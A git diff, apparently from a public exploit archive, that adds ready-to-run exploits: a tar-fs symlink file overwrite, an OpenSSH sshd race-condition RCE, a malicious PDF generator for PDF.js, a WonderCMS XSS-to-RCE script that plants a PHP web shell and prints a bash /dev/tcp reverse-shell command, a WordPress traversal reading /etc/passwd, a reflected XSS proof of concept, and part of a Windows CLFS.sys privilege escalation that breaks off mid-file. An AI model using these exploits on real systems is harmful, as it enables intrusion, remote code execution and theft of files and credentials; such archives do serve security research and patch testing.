diff --git a/exploits/linux/local/52268.py b/exploits/linux/local/52268.py new file mode 100755 index 000000000..4a26a7397 --- /dev/null +++ b/exploits/linux/local/52268.py @@ -0,0 +1,55 @@ +# Exploit Title: tar-fs 3.0.0 - Arbitrary File Write/Overwrite +# Date: 17th April, 2024 +# Exploit Author: Ardayfio Samuel Nii Aryee +# Software link: https://github.com/mafintosh/tar-fs +# Version: tar-fs 3.0.0 +# Tested on: Ubuntu +# CVE: CVE-2024-12905 + + +# Run the command: Example: python3 exploit.py authorized_keys ../../../../../../../../home/user1/authorized_keys +# This will generate two tar file: stage_1.tar and stage_2.tar +# Upload stage_1.tar first to unarchive the symlink +# Next, upload stage_2.tar to finally write/overwrite the file on the system + + +import os +import sys +import tarfile + +link_name = "normal_file" + +def check_arguments(): + if len(sys.argv) != 3: + print(f"Usage: {sys.argv[0]} \n\ +Example: {sys.argv[0]} authorized_keys ../../../../../../../../home/user1/authorized_keys\ + ") + sys.exit() + content_file_path = sys.argv[1] + target_file_path = sys.argv[2] + + return content_file_path, target_file_path + +def create_symlink(link_name, target_path): + os.symlink(target_path, link_name) + print("[+] Created symlink: {link_name} -> {target_path}") + +def archive_files(archive_name, file_path): + tar = tarfile.open(archive_name, 'w') + tar.add(file_path, link_name, recursive=False) + tar.close() + print(f"[+] Archived to: {archive_name}") + +def main(): + content_path, target_file = check_arguments() + + stage_1_archive_name = "stage_1.tar" + stage_2_archive_name = "stage_2.tar" + + create_symlink(link_name, target_file) + + archive_files(stage_1_archive_name, link_name) + archive_files(stage_2_archive_name, content_path) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/linux/remote/52269.c b/exploits/linux/remote/52269.c new file mode 100644 index 000000000..c826f1a4b --- /dev/null +++ b/exploits/linux/remote/52269.c @@ -0,0 +1,575 @@ + * Exploit Title : OpenSSH server (sshd) 9.8p1 - Race Condition + * Author : Milad Karimi (Ex3ptionaL) + * Date : 2025-04-16 + * + * Description: + * Targets a signal handler race condition in OpenSSH's + * server (sshd) on glibc-based Linux systems. It exploits a vulnerability + * where the SIGALRM handler calls async-signal-unsafe functions, leading + * to rce as root. + * + * Notes: + * 1. Shellcode : Replace placeholder with actual payload. + * 2. GLIBC_BASES : Needs adjustment for specific target systems. + * 3. Timing parameters: Fine-tune based on target system responsiveness. + * 4. Heap layout : Requires tweaking for different OpenSSH versions. + * 5. File structure offsets: Verify for the specific glibc version. + * ------------------------------------------------------------------------- + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAX_PACKET_SIZE (256 * 1024) +#define LOGIN_GRACE_TIME 120 +#define MAX_STARTUPS 100 +#define CHUNK_ALIGN(s) (((s) + 15) & ~15) + +// Possible glibc base addresses (for ASLR bypass) +uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 }; +int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]); + +// Shellcode placeholder (replace with actual shellcode) +unsigned char shellcode[] = "\x90\x90\x90\x90"; + +int setup_connection (const char *ip, int port); +void send_packet (int sock, unsigned char packet_type, + const unsigned char *data, size_t len); +void prepare_heap (int sock); +void time_final_packet (int sock, double *parsing_time); +int attempt_race_condition (int sock, double parsing_time, + uint64_t glibc_base); +double measure_response_time (int sock, int error_type); +void create_public_key_packet (unsigned char *packet, size_t size, + uint64_t glibc_base); +void create_fake_file_structure (unsigned char *data, size_t size, + uint64_t glibc_base); +void send_ssh_version (int sock); +int receive_ssh_version (int sock); +void send_kex_init (int sock); +int receive_kex_init (int sock); +int perform_ssh_handshake (int sock); + +int +main (int argc, char *argv[]) +{ + if (argc != 3) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (1); + } + + const char *ip = argv[1]; + int port = atoi (argv[2]); + double parsing_time = 0; + int success = 0; + + srand (time (NULL)); + + // Attempt exploitation for each possible glibc base address + for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++) + { + uint64_t glibc_base = GLIBC_BASES[base_idx]; + printf ("Attempting exploitation with glibc base: 0x%lx\n", +glibc_base); + + // The advisory mentions "~10,000 tries on average" + for (int attempt = 0; attempt < 20000 && !success; attempt++) + { + if (attempt % 1000 == 0) + { + printf ("Attempt %d of 20000\n", attempt); + } + + int sock = setup_connection (ip, port); + if (sock < 0) + { + fprintf (stderr, "Failed to establish connection, attempt +%d\n", + attempt); + continue; + } + + if (perform_ssh_handshake (sock) < 0) + { + fprintf (stderr, "SSH handshake failed, attempt %d\n", +attempt); + close (sock); + continue; + } + + prepare_heap (sock); + time_final_packet (sock, &parsing_time); + + if (attempt_race_condition (sock, parsing_time, glibc_base)) + { + printf ("Possible exploitation success on attempt %d with +glibc " + "base 0x%lx!\n", + attempt, glibc_base); + success = 1; + break; + } + + close (sock); + usleep (100000); // 100ms delay between attempts, as mentioned in +the + // advisory + } + } + + return !success; +} + +int +setup_connection (const char *ip, int port) +{ + int sock = socket (AF_INET, SOCK_STREAM, 0); + if (sock < 0) + { + perror ("socket"); + return -1; + } + + struct sockaddr_in server_addr; + memset (&server_addr, 0, sizeof (server_addr)); + server_addr.sin_family = AF_INET; + server_addr.sin_port = htons (port); + if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0) + { + perror ("inet_pton"); + close (sock); + return -1; + } + + if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr)) + < 0) + { + perror ("connect"); + close (sock); + return -1; + } + + // Set socket to non-blocking mode + int flags = fcntl (sock, F_GETFL, 0); + fcntl (sock, F_SETFL, flags | O_NONBLOCK); + + return sock; +} + +void +send_packet (int sock, unsigned char packet_type, const unsigned char *data, + size_t len) +{ + unsigned char packet[MAX_PACKET_SIZE]; + size_t packet_len = len + 5; + + packet[0] = (packet_len >> 24) & 0xFF; + packet[1] = (packet_len >> 16) & 0xFF; + packet[2] = (packet_len >> 8) & 0xFF; + packet[3] = packet_len & 0xFF; + packet[4] = packet_type; + + memcpy (packet + 5, data, len); + + if (send (sock, packet, packet_len, 0) < 0) + { + perror ("send_packet"); + } +} + +void +send_ssh_version (int sock) +{ + const char *ssh_version = "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n"; + if (send (sock, ssh_version, strlen (ssh_version), 0) < 0) + { + perror ("send ssh version"); + } +} + +int +receive_ssh_version (int sock) +{ + char buffer[256]; + ssize_t received; + do + { + received = recv (sock, buffer, sizeof (buffer) - 1, 0); + } + while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN)); + + if (received > 0) + { + buffer[received] = '\0'; + printf ("Received SSH version: %s", buffer); + return 0; + } + else if (received == 0) + { + fprintf (stderr, "Connection closed while receiving SSH version\n"); + } + else + { + perror ("receive ssh version"); + } + return -1; +} + +void +send_kex_init (int sock) +{ + unsigned char kexinit_payload[36] = { 0 }; + send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload)); +} + +int +receive_kex_init (int sock) +{ + unsigned char buffer[1024]; + ssize_t received; + do + { + received = recv (sock, buffer, sizeof (buffer), 0); + } + while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN)); + + if (received > 0) + { + printf ("Received KEX_INIT (%zd bytes)\n", received); + return 0; + } + else if (received == 0) + { + fprintf (stderr, "Connection closed while receiving KEX_INIT\n"); + } + else + { + perror ("receive kex init"); + } + return -1; +} + +int +perform_ssh_handshake (int sock) +{ + send_ssh_version (sock); + if (receive_ssh_version (sock) < 0) + return -1; + send_kex_init (sock); + if (receive_kex_init (sock) < 0) + return -1; + return 0; +} + +void +prepare_heap (int sock) +{ + // Packet a: Allocate and free tcache chunks + for (int i = 0; i < 10; i++) + { + unsigned char tcache_chunk[64]; + memset (tcache_chunk, 'A', sizeof (tcache_chunk)); + send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk)); + // These will be freed by the server, populating tcache + } + + // Packet b: Create 27 pairs of large (~8KB) and small (320B) holes + for (int i = 0; i < 27; i++) + { + // Allocate large chunk (~8KB) + unsigned char large_hole[8192]; + memset (large_hole, 'B', sizeof (large_hole)); + send_packet (sock, 5, large_hole, sizeof (large_hole)); + + // Allocate small chunk (320B) + unsigned char small_hole[320]; + memset (small_hole, 'C', sizeof (small_hole)); + send_packet (sock, 5, small_hole, sizeof (small_hole)); + } + + // Packet c: Write fake headers, footers, vtable and _codecvt pointers + for (int i = 0; i < 27; i++) + { + unsigned char fake_data[4096]; + create_fake_file_structure (fake_data, sizeof (fake_data), + GLIBC_BASES[0]); + send_packet (sock, 5, fake_data, sizeof (fake_data)); + } + + // Packet d: Ensure holes are in correct malloc bins (send ~256KB string) + unsigned char large_string[MAX_PACKET_SIZE - 1]; + memset (large_string, 'E', sizeof (large_string)); + send_packet (sock, 5, large_string, sizeof (large_string)); +} + +void +create_fake_file_structure (unsigned char *data, size_t size, + uint64_t glibc_base) +{ + memset (data, 0, size); + + struct + { + void *_IO_read_ptr; + void *_IO_read_end; + void *_IO_read_base; + void *_IO_write_base; + void *_IO_write_ptr; + void *_IO_write_end; + void *_IO_buf_base; + void *_IO_buf_end; + void *_IO_save_base; + void *_IO_backup_base; + void *_IO_save_end; + void *_markers; + void *_chain; + int _fileno; + int _flags; + int _mode; + char _unused2[40]; + void *_vtable_offset; + } *fake_file = (void *)data; + + // Set _vtable_offset to 0x61 as described in the advisory + fake_file->_vtable_offset = (void *)0x61; + + // Set up fake vtable and _codecvt pointers + *(uint64_t *)(data + size - 16) + = glibc_base + 0x21b740; // fake vtable (_IO_wfile_jumps) + *(uint64_t *)(data + size - 8) = glibc_base + 0x21d7f8; // fake _codecvt +} + +void +time_final_packet (int sock, double *parsing_time) +{ + double time_before = measure_response_time (sock, 1); + double time_after = measure_response_time (sock, 2); + *parsing_time = time_after - time_before; + + printf ("Estimated parsing time: %.6f seconds\n", *parsing_time); +} + +double +measure_response_time (int sock, int error_type) +{ + unsigned char error_packet[1024]; + size_t packet_size; + + if (error_type == 1) + { + // Error before sshkey_from_blob + packet_size = snprintf ((char *)error_packet, sizeof (error_packet), + "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3"); + } + else + { + // Error after sshkey_from_blob + packet_size = snprintf ((char *)error_packet, sizeof (error_packet), + "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9"); + } + + struct timespec start, end; + clock_gettime (CLOCK_MONOTONIC, &start); + + send_packet (sock, 50, error_packet, + packet_size); // SSH_MSG_USERAUTH_REQUEST + + char response[1024]; + ssize_t received; + do + { + received = recv (sock, response, sizeof (response), 0); + } + while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN)); + + clock_gettime (CLOCK_MONOTONIC, &end); + + double elapsed + = (end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1e9; + return elapsed; +} + +void +create_public_key_packet (unsigned char *packet, size_t size, + uint64_t glibc_base) +{ + memset (packet, 0, size); + + size_t offset = 0; + for (int i = 0; i < 27; i++) + { + // malloc(~4KB) - This is for the large hole + *(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096); + offset += CHUNK_ALIGN (4096); + + // malloc(304) - This is for the small hole (potential FILE structure) + *(uint32_t *)(packet + offset) = CHUNK_ALIGN (304); + offset += CHUNK_ALIGN (304); + } + + // Add necessary headers for the SSH public key format + memcpy (packet, "ssh-rsa ", 8); + + // Place shellcode in the heap via previous allocations + memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13, +shellcode, + sizeof (shellcode)); + + // Set up the fake FILE structures within the packet + for (int i = 0; i < 27; i++) + { + create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1) + + CHUNK_ALIGN (304) * i, + CHUNK_ALIGN (304), glibc_base); + } +} + +int +attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base) +{ + unsigned char final_packet[MAX_PACKET_SIZE]; + create_public_key_packet (final_packet, sizeof (final_packet), +glibc_base); + + // Send all but the last byte + if (send (sock, final_packet, sizeof (final_packet) - 1, 0) < 0) + { + perror ("send final packet"); + return 0; + } + + // Precise timing for last byte + struct timespec start, current; + clock_gettime (CLOCK_MONOTONIC, &start); + + while (1) + { + clock_gettime (CLOCK_MONOTONIC, ¤t); + double elapsed = (current.tv_sec - start.tv_sec) + + (current.tv_nsec - start.tv_nsec) / 1e9; + if (elapsed >= (LOGIN_GRACE_TIME - parsing_time - 0.001)) + { // 1ms before SIGALRM + if (send (sock, &final_packet[sizeof (final_packet) - 1], 1, 0) < +0) + { + perror ("send last byte"); + return 0; + } + break; + } + } + + // Check for successful exploitation + char response[1024]; + ssize_t received = recv (sock, response, sizeof (response), 0); + if (received > 0) + { + printf ("Received response after exploit attempt (%zd bytes)\n", + received); + // Analyze response to determine if we hit the "large" race window + if (memcmp (response, "SSH-2.0-", 8) != 0) + { + printf ("Possible hit on 'large' race window\n"); + return 1; + } + } + else if (received == 0) + { + printf ( + "Connection closed by server - possible successful +exploitation\n"); + return 1; + } + else if (errno == EWOULDBLOCK || errno == EAGAIN) + { + printf ("No immediate response from server - possible successful " + "exploitation\n"); + return 1; + } + else + { + perror ("recv"); + } + return 0; +} + +int +perform_exploit (const char *ip, int port) +{ + int success = 0; + double parsing_time = 0; + double timing_adjustment = 0; + + for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++) + { + uint64_t glibc_base = GLIBC_BASES[base_idx]; + printf ("Attempting exploitation with glibc base: 0x%lx\n", +glibc_base); + + for (int attempt = 0; attempt < 10000 && !success; attempt++) + { + if (attempt % 1000 == 0) + { + printf ("Attempt %d of 10000\n", attempt); + } + + int sock = setup_connection (ip, port); + if (sock < 0) + { + fprintf (stderr, "Failed to establish connection, attempt +%d\n", + attempt); + continue; + } + + if (perform_ssh_handshake (sock) < 0) + { + fprintf (stderr, "SSH handshake failed, attempt %d\n", +attempt); + close (sock); + continue; + } + + prepare_heap (sock); + time_final_packet (sock, &parsing_time); + + // Implement feedback-based timing strategy + parsing_time += timing_adjustment; + + if (attempt_race_condition (sock, parsing_time, glibc_base)) + { + printf ("Possible exploitation success on attempt %d with +glibc " + "base 0x%lx!\n", + attempt, glibc_base); + success = 1; + // In a real exploit, we would now attempt to interact with +the + // shell + } + else + { + // Adjust timing based on feedback + timing_adjustment += 0.00001; // Small incremental adjustment + } + + close (sock); + usleep (100000); // 100ms delay between attempts, as mentioned in +the + // advisory + } + } + + return success; +} \ No newline at end of file diff --git a/exploits/multiple/remote/52273.py b/exploits/multiple/remote/52273.py new file mode 100755 index 000000000..b84a2af6c --- /dev/null +++ b/exploits/multiple/remote/52273.py @@ -0,0 +1,194 @@ +# Exploit Title: Firefox ESR 115.11 - Arbitrary JavaScript execution in +PDF.js +# Date: 2025-04-16 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# MiRROR-H: https://mirror-h.org/search/hacker/49626/ +# Vendor Homepage: https://wordpress.org +# Version: = 115.11 +# Tested on: Win, Ubuntu +# CVE : CVE-2024-4367 + +#!/usr/bin/env python3 + +import sys + +def generate_payload(payload): + backslash_char = "\\" + fmt_payload = payload.replace('(', '\\(').replace(')', '\\)') + font_matrix = f"/FontMatrix [0.1 0 0 0.1 0 (1{backslash_char});\n" + +f"{fmt_payload}" + "\n//)]" + return f""" +%PDF-1.4 +%DUMMY +8 0 obj +<< +/PatternType 2 +/Shading<< + /Function<< + /Domain[0 1] + /C0[0 0 1] + /C1[1 0.6 0] + /N 1 + /FunctionType 2 + >> + /ShadingType 2 + /Coords[46 400 537 400] + /Extend[false false] + /ColorSpace/DeviceRGB +>> +/Type/Pattern +>> +endobj +5 0 obj +<< +/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 +0 0 573 0 573 0 341] +/Type/Font +/BaseFont/PAXEKO+SourceSansPro-Bold +/LastChar 102 +/Encoding/WinAnsiEncoding +{font_matrix} +/Subtype/Type1 +/FirstChar 65 +/FontDescriptor 9 0 R +>> +endobj +2 0 obj +<< +/Kids[3 0 R] +/Type/Pages +/Count 1 +>> +endobj +9 0 obj +<< +/Type/FontDescriptor +/ItalicAngle 0 +/Ascent 751 +/FontBBox[-6 -12 579 713] +/FontName/PAXEKO+SourceSansPro-Bold +/StemV 100 +/CapHeight 713 +/Flags 32 +/FontFile3 10 0 R +/Descent -173 +/MissingWidth 250 +>> +endobj +6 0 obj +<< +/Length 128 +>> +stream +47 379 489 230 re S +/Pattern cs +BT + 50 500 Td + 117 TL + /F1 150 Tf + /P1 scn + (AbCdEf) Tj + /P2 scn + (AbCdEf) ' +ET +endstream +endobj +3 0 obj +<< +/Type/Page +/Resources 4 0 R +/Contents 6 0 R +/Parent 2 0 R +/MediaBox[0 0 595.2756 841.8898] +>> +endobj +10 0 obj +<< +/Length 800 +/Subtype/Type2 +>> +stream + +endstream +endobj +7 0 obj +<< +/PatternType 1 +/Matrix[1 0 0 1 50 0] +/Length 58 +/TilingType 1 +/BBox[0 0 16 16] +/YStep 16 +/PaintType 1 +/Resources<< +>> +/XStep 16 +>> +stream +0.65 g +0 0 16 16 re f +0.15 g +0 0 8 8 re f +8 8 8 8 re f +endstream +endobj +4 0 obj +<< +/Pattern<< + /P1 7 0 R + /P2 8 0 R +>> +/Font<< + /F1 5 0 R +>> +>> +endobj +1 0 obj +<< +/Pages 2 0 R +/Type/Catalog +/OpenAction[3 0 R /Fit] +>> +endobj + +xref +0 11 +0000000000 65535 f +0000002260 00000 n +0000000522 00000 n +0000000973 00000 n +0000002178 00000 n +0000000266 00000 n +0000000794 00000 n +0000001953 00000 n +0000000015 00000 n +0000000577 00000 n +0000001085 00000 n +trailer +<< +/ID[(DUMMY) (DUMMY)] +/Root 1 0 R +/Size 11 +>> +startxref +2333 +%%EOF +""" + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print(f"Usage: {sys.argv[0]} ") + sys.exit(1) + print("[+] Created malicious PDF file: poc.pdf") + print("[+] Open the file with the vulnerable application to trigger the +exploit.") + + payload = generate_payload( + sys.argv[1]) + with open("poc.pdf", "w") as f: + f.write(payload) + + sys.exit(0) \ No newline at end of file diff --git a/exploits/php/remote/52271.py b/exploits/php/remote/52271.py new file mode 100755 index 000000000..11a5454cf --- /dev/null +++ b/exploits/php/remote/52271.py @@ -0,0 +1,82 @@ +# Exploit Title: WonderCMS 3.4.2 - Remote Code Execution (RCE) +# Date: 2025-04-16 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# MiRROR-H: https://mirror-h.org/search/hacker/49626/ +# CVE: CVE-2023-41425 + +import requests +import argparse +from argparse import RawTextHelpFormatter +import os +import subprocess +import zipfile +from termcolor import colored + +def main(): + parser = argparse.ArgumentParser(description="Exploit Wonder CMS v3.4.2 +XSS to RCE", formatter_class=RawTextHelpFormatter) + parser.add_argument("--url", required=True, help="Target URL of +loginURL (Example: http://sea.htb/loginURL)") + parser.add_argument("--xip", required=True, help="IP for HTTP web +server that hosts the malicious .js file") + parser.add_argument("--xport", required=True, help="Port for HTTP web +server that hosts the malicious .js file") + args = parser.parse_args() + + target_login_url = args.url + target_split = args.url.split('/') + target_url = target_split[0] + '//' + target_split[2] + + # Web Shell + print("[+] Creating PHP Web Shell") + if not os.path.exists('malicious'): + os.mkdir('malicious') + with open ('malicious/malicious.php', 'w') as f: + f.write('') + with zipfile.ZipFile('./malicious.zip', 'w') as z: + z.write('malicious/malicious.php') + os.remove('malicious/malicious.php') + os.rmdir('malicious') + else: + print(colored("[!] Directory malicious already exists!", 'yellow')) + + # Malicious .js + js = f'''var token = +document.querySelectorAll('[name="token"]')[0].value; +var module_url = +"{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token=" ++ token; +var xhr = new XMLHttpRequest(); +xhr.withCredentials = true; +xhr.open("GET", module_url); +xhr.send();''' + + print("[+] Writing malicious.js") + with open('malicious.js', 'w') as f: + f.write(js) + + + xss_payload = args.url.replace("loginURL", +"index.php?page=loginURL?")+"\">", +'red')) + print("[+] To get a reverse shell connection run the following:") + print(colored(f"curl -s '{target_url}/themes/malicious/malicious.php' +--get --data-urlencode \"cmd=bash -c 'bash -i >& /dev/tcp// +0>&1'\" ", 'yellow')) + + print("[+] Starting HTTP server") + subprocess.run(["python3", "-m", "http.server", "-b", args.xip, +args.xport]) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/remote/52272.txt b/exploits/php/remote/52272.txt new file mode 100644 index 000000000..8827e6e86 --- /dev/null +++ b/exploits/php/remote/52272.txt @@ -0,0 +1,35 @@ +# Exploit Title: code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS) +# Google Dork: inurl:/exam/feedback.php +# Date: 2025-04-19 +# Exploit Author: Pruthu Raut +# Vendor Homepage: https://code-projects.org/ +# Software Link: https://code-projects.org/online-exam-system-in-php-with-source-code/ +# Version: 1.0 +# Tested on: XAMPP on Windows 10 / Kali Linux (Apache + PHP 7.x) +# CVE : CVE-2025-28121 + +# Description: +# code-projects Online Exam Mastering System 1.0 is vulnerable to a Reflected XSS vulnerability in feedback.php via the "q" parameter. +# The application fails to sanitize user input properly, allowing attackers to inject arbitrary JavaScript code. + +# Vulnerable URL: +# http://localhost/exam/feedback.php?q=Thank%20you%20for%20your%20valuable%20feedback + +# PoC (Proof of Concept): +# Payload: +http://localhost/exam/feedback.php?q= + +# Steps to Reproduce: +# 1. Host the application locally using XAMPP or a similar stack. +# 2. Open the vulnerable URL with the payload in a browser. +# 3. The JavaScript alert will be executed, demonstrating reflected XSS. + +# Impact: +# - Account takeover via stolen cookies if a privileged user clicks the malicious link. +# - Full control of victim’s session context if exploited properly. +# - Can be chained with social engineering to target administrators. + +# Mitigation: +# - Use `htmlspecialchars()` or a proper encoding mechanism to sanitize user input. +# - Implement Content Security Policy (CSP) headers. +# - Avoid reflecting unsanitized GET parameters into the HTML response. \ No newline at end of file diff --git a/exploits/php/webapps/52274.py b/exploits/php/webapps/52274.py new file mode 100755 index 000000000..ddfe0116d --- /dev/null +++ b/exploits/php/webapps/52274.py @@ -0,0 +1,34 @@ +# Exploit Title: WordPress Core 6.2 - Directory Traversal +# Date: 2025-04-16 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# Version: = 6.2 +# Tested on: Win, Ubuntu +# CVE : CVE-2023-2745 + + + +import requests +from colorama import init, Fore, Style +init(autoreset=True) +url = input("E.G https://example.com/wp-login.php : ") +payload = '../../../../../etc/passwd' +response = requests.get(url, params={'wp_lang': payload}) +if response.status_code == 200: + if "root:x:0:0:root" in response.text: + print(Fore.GREEN + 'Exploit successful, accessed content:') + print(Fore.GREEN + response.text) + else: + print(Fore.YELLOW + 'Accessed content, but the expected file was +not found:') + print(Fore.YELLOW + response.text) +elif response.status_code in {400, 401, 403, 404}: + print(Fore.RED + f'Client error, status code: {response.status_code}') +elif response.status_code // 100 == 5: + print(Fore.RED + f'Server error, status code: {response.status_code}') +elif response.status_code // 100 == 3: + print(Fore.YELLOW + f'Redirection, status code: +{response.status_code}') +else: + print(f'Status code: {response.status_code}') \ No newline at end of file diff --git a/exploits/windows/local/52270.c b/exploits/windows/local/52270.c new file mode 100644 index 000000000..053a77b5f --- /dev/null +++ b/exploits/windows/local/52270.c @@ -0,0 +1,567 @@ +# Exploit Title: Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege +# Date: 2025-04-16 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# MiRROR-H: https://mirror-h.org/search/hacker/49626/ +# CVE: CVE-2024-49138 + + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "resource.h" + +#define CONTROL_BLOCK_SIZE 0x400 +#define OFFSET_EXTENDED_STATE 0x84 +#define OFFSET_IEXTENDED_BLOCK 0x88 +#define OFFSET_IFLUSHB_BLOCK 0x8c + +#define _CRT_SECURE_NO_WARNINGS 1 + +//dt nt!_KTHREAD current +//+ 0x230 UserAffinityPrimaryGroup : 0 +//+ 0x232 PreviousMode : 1 '' +//+ 0x233 BasePriority : 15 '' +//+ 0x234 PriorityDecrement : 0 '' +//+ 0x234 ForegroundBoost : 0y0000 +//+ 0x234 UnusualBoost : 0y0000 +//+ 0x235 Preempted : 0 '' +//+ 0x236 AdjustReason : 0 '' +//+ 0x237 AdjustIncrement : 0 '' +//+ 0x238 AffinityVersion : 0x14 +//+ 0x240 Affinity : 0xffffc201`419e1a58 _KAFFINITY_EX +//WINDBG > dq ffffc201419e1080 + 0x232 L1 +//ffffc201`419e12b2 00140000`00000f01 + +//WINDBG > ? nt!PoFxProcessorNotification - nt +//Evaluate expression : 3861424 = 00000000`003aebb0 +//WINDBG > ? nt!DbgkpTriageDumpRestoreState - nt +//Evaluate expression : 8324768 = 00000000`007f06a0 +//WINDBG > ? nt!PsActiveProcessHead - nt +//Evaluate expression : 12812128 = 00000000`00c37f60 + +#define POFXPROCESSORNOTIFICATION_OFFSET 0x3aebb0 +#define DBGKPTRIAGEDUMPRESTORESTATE_OFFSET 0x7f06a0 +#define PSACTIVEPROCESSHEAD_OFFSET 0xc37f60 +#define ACTIVEPROCESSLINKS_OFFSET 0x448 +#define UNIQUEPROCESSID_OFFSET 0x440 +#define TOKEN_OFFSET 0x4b8 +#define TOKENPRIVILEGESPRESENT_OFFSET 0x40 +#define TOKENPRIVILEGSENABLED_OFFSET 0x48 + +#pragma comment(lib, "Clfsw32.lib") + +LPVOID GetKernelBaseAddress() { + LPVOID drivers[1024]; // Array to hold driver addresses + DWORD cbNeeded; // Bytes returned by EnumDeviceDrivers + int driverCount; + TCHAR driverName[MAX_PATH]; + + // Enumerate loaded device drivers + if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) { + printf("Failed to enumerate device drivers. Error: %lu\n", +GetLastError()); + return (LPVOID)0x0; + } + + driverCount = cbNeeded / sizeof(drivers[0]); + + if (driverCount == 0) { + printf("No device drivers found.\n"); + return (LPVOID)0x0; + } + + // The first driver is usually the Windows kernel + LPVOID kernelBaseAddress = drivers[0]; + + // Retrieve the name of the kernel driver + if (GetDeviceDriverBaseName(kernelBaseAddress, driverName, MAX_PATH)) { + printf("Kernel Base Address: 0x%p\n", kernelBaseAddress); + printf("Kernel Name: %ls\n", driverName); + } + else { + printf("Failed to retrieve kernel name. Error: %lu\n", +GetLastError()); + } + + return kernelBaseAddress; + +} + + +#define SystemHandleInformation 0x10 +#define SystemHandleInformationSize 1024 * 1024 * 2 + +using fNtQuerySystemInformation = NTSTATUS(WINAPI*)( + ULONG SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength + ); + +// Definitions for NTSTATUS and system calls +using fNtReadVirtualMemory = NTSTATUS(WINAPI*)( + HANDLE ProcessHandle, + PVOID BaseAddress, + PVOID Buffer, + ULONG BufferSize, + PULONG NumberOfBytesRead); + +using fNtWriteVirtualMemory = NTSTATUS(WINAPI*)( + HANDLE ProcessHandle, + PVOID BaseAddress, + PVOID Buffer, + ULONG BufferSize, + PULONG NumberOfBytesWritten); + +fNtReadVirtualMemory NtReadVirtualMemory = NULL; +fNtWriteVirtualMemory NtWriteVirtualMemory = NULL; + +// handle information +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO +{ + USHORT UniqueProcessId; + USHORT CreatorBackTraceIndex; + UCHAR ObjectTypeIndex; + UCHAR HandleAttributes; + USHORT HandleValue; + PVOID Object; + ULONG GrantedAccess; +} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; + +// handle table information +typedef struct _SYSTEM_HANDLE_INFORMATION +{ + ULONG NumberOfHandles; + SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; +} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; + +PVOID GetKAddrFromHandle(HANDLE handle) { + ULONG returnLength = 0; + fNtQuerySystemInformation NtQuerySystemInformation = +(fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), +"NtQuerySystemInformation"); + PSYSTEM_HANDLE_INFORMATION handleTableInformation = +(PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, +SystemHandleInformationSize); + NtQuerySystemInformation(SystemHandleInformation, +handleTableInformation, SystemHandleInformationSize, &returnLength); + + ULONG numberOfHandles = handleTableInformation->NumberOfHandles; + + HeapFree(GetProcessHeap(), 0, handleTableInformation); + handleTableInformation = +(PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, +numberOfHandles * sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO) + +sizeof(SYSTEM_HANDLE_INFORMATION) + 0x100); + NtQuerySystemInformation(SystemHandleInformation, +handleTableInformation, numberOfHandles * +sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO) + sizeof(SYSTEM_HANDLE_INFORMATION) ++ 0x100, &returnLength); + + for (int i = 0; i < handleTableInformation->NumberOfHandles; i++) + { + SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = +(SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i]; + + if (handleInfo.HandleValue == (USHORT)handle && +handleInfo.UniqueProcessId == GetCurrentProcessId()) + { + return handleInfo.Object; + } + } +} + + +LPVOID 